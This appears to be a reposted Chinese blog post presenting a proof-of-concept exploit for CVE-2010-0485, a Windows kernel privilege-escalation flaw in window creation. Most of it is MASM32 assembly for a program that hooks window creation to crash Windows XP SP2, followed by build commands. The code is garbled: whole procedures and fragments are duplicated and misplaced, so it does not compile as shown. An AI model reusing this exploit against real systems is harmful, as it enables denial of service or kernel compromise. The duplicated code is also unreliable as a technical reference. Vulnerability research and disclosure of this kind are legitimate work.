漏洞介绍:
CVE ID :CVE-2010-0485
由于 Windows 内核模式驱动程序在创建窗口时未正确验证所有参数,因此存在一个特权提升漏洞。 成功利用此漏洞的***者可以运行内核模式中的任意代码。 ***者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。
应用程序通过hook 函数CBTProc并判断当nCode值为HCBT_CREATEWND时,hook函数就可以使hWndInsertAfter成为其它窗口的hwnd 。当用户按下WindowsKey+D最小化所有窗口时即可触发这个函数。
测试环境:
操作系统:WIN XP SP2
测试过程:
1、运行测试程序
2、按下WindowsKey+D
3、系统蓝屏
程序代码:
.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
include user32.inc
include kernel32.inc
includelib user32.lib
includelib kernel32.lib
.const
.data
_wnd db "hcbtExploit",0
.data?
hhook dd ?
.code
.data
_wnd db "hcbtExploit",0
.data?
hhook dd ?
.code
WndProc proc hWnd:HWND,uMsg:UINT,wParam:WPARAM,lParam:LPARAM
.if uMsg==WM_DESTROY
invoke PostQuitMessage,0
xor eax,eax
.else
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
.endif
ret
WndProc endp
.if uMsg==WM_DESTROY
invoke PostQuitMessage,0
xor eax,eax
.else
invoke DefWindowProc,hWnd,uMsg,wParam,lParam
.endif
ret
WndProc endp
HookProc proc uses ebx nCode:UINT,wParam:WPARAM,lParam:LPARAM
local buf[MAX_PATH]:BYTE
.if nCode==HCBT_CREATEWND
invoke GetClassName,wParam,addr buf,MAX_PATH
invoke lstrcmpi,addr buf,offset _wnd
.if eax==0
mov ebx,lParam
assume ebx:PTR CBT_CREATEWND
invoke GetDesktopWindow
invoke GetWindow,eax,GW_CHILD
invoke GetWindow,eax,GW_HWNDLAST ; (Progman)
invoke GetWindow,eax,GW_CHILD ; (SHELLDLL_DefView)
mov [ebx].hWndInsertAfter,eax
assume ebx:nothing
.endif
xor eax,eax
.else
invoke CallNextHookEx,hhook,nCode,wParam,lParam
.endif
ret
HookProc endp
local buf[MAX_PATH]:BYTE
.if nCode==HCBT_CREATEWND
invoke GetClassName,wParam,addr buf,MAX_PATH
invoke lstrcmpi,addr buf,offset _wnd
.if eax==0
mov ebx,lParam
assume ebx:PTR CBT_CREATEWND
invoke GetDesktopWindow
invoke GetWindow,eax,GW_CHILD
invoke GetWindow,eax,GW_HWNDLAST ; (Progman)
invoke GetWindow,eax,GW_CHILD ; (SHELLDLL_DefView)
mov [ebx].hWndInsertAfter,eax
assume ebx:nothing
.endif
xor eax,eax
.else
invoke CallNextHookEx,hhook,nCode,wParam,lParam
.endif
ret
HookProc endp
WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
local wc:WNDCLASSEX
local msg:MSG
local hwnd:HWND
mov wc.cbSize,sizeof wc
mov wc.style,CS_VREDRAW
mov wc.lpfnWndProc,offset WndProc
mov wc.cbClsExtra,0
mov wc.cbWndExtra,0
mov eax,hInst
mov wc.hInstance,eax
mov wc.hbrBackground,COLOR_WINDOW
mov wc.lpszMenuName,0
mov wc.lpszClassName,offset _wnd
invoke LoadIcon,0,IDI_WARNING
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,0,IDC_CROSS
mov wc.hCursor,eax
invoke RegisterClassEx,addr wc
local wc:WNDCLASSEX
local msg:MSG
local hwnd:HWND
mov wc.cbSize,sizeof wc
mov wc.style,CS_VREDRAW
mov wc.lpfnWndProc,offset WndProc
mov wc.cbClsExtra,0
mov wc.cbWndExtra,0
mov eax,hInst
mov wc.hInstance,eax
mov wc.hbrBackground,COLOR_WINDOW
mov wc.lpszMenuName,0
mov wc.lpszClassName,offset _wnd
invoke LoadIcon,0,IDI_WARNING
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,0,IDC_CROSS
mov wc.hCursor,eax
invoke RegisterClassEx,addr wc
invoke GetCurrentThreadId
invoke SetWindowsHookEx,WH_CBT,offset HookProc,0,eax
mov hhook,eax
invoke SetWindowsHookEx,WH_CBT,offset HookProc,0,eax
mov hhook,eax
invoke CreateWindowEx,\
0,\
offset _wnd,offset _wnd,\
WS_OVERLAPPEDWINDOW,\
400,250,600,400,0,0,hInst,0
mov hwnd,eax
0,\
offset _wnd,offset _wnd,\
WS_OVERLAPPEDWINDOW,\
400,250,600,400,0,0,hInst,0
mov hwnd,eax
invoke UnhookWindowsHookEx,hhook
invoke ShowWindow,hwnd,CmdShow
invoke UpdateWindow,hwnd
invoke UpdateWindow,hwnd
.while TRUE
invoke GetMessage,addr msg,0,0,0
.break .if (!eax)
invoke TranslateMessage,addr msg
invoke DispatchMessage,addr msg
.endw
mov eax,msg.wParam
ret
WinMain endp
invoke GetMessage,addr msg,0,0,0
.break .if (!eax)
invoke TranslateMessage,addr msg
invoke DispatchMessage,addr msg
.endw
mov eax,msg.wParam
ret
WinMain endp
start:
invoke GetModuleHandle,0
invoke WinMain,eax,0,0,SW_SHOWNORMAL
invoke ExitProcess,eax
end start
invoke GetModuleHandle,0
invoke WinMain,eax,0,0,SW_SHOWNORMAL
invoke ExitProcess,eax
end start
编译说明:
测试代码用Win32汇编编写,使用MASM32编译即可,Win32汇编环境搭建我之前已有介绍,将环境搭建好后进入到程序目录下,使用ml /c /coff hcbtExploit.asm命令编译,然后进行连接link /subsystem:windows hcbtExploit.obj,即可生成测试程序hcbtExploit.exe
转载于:https://blog.51cto.com/yueyuanyuan/370626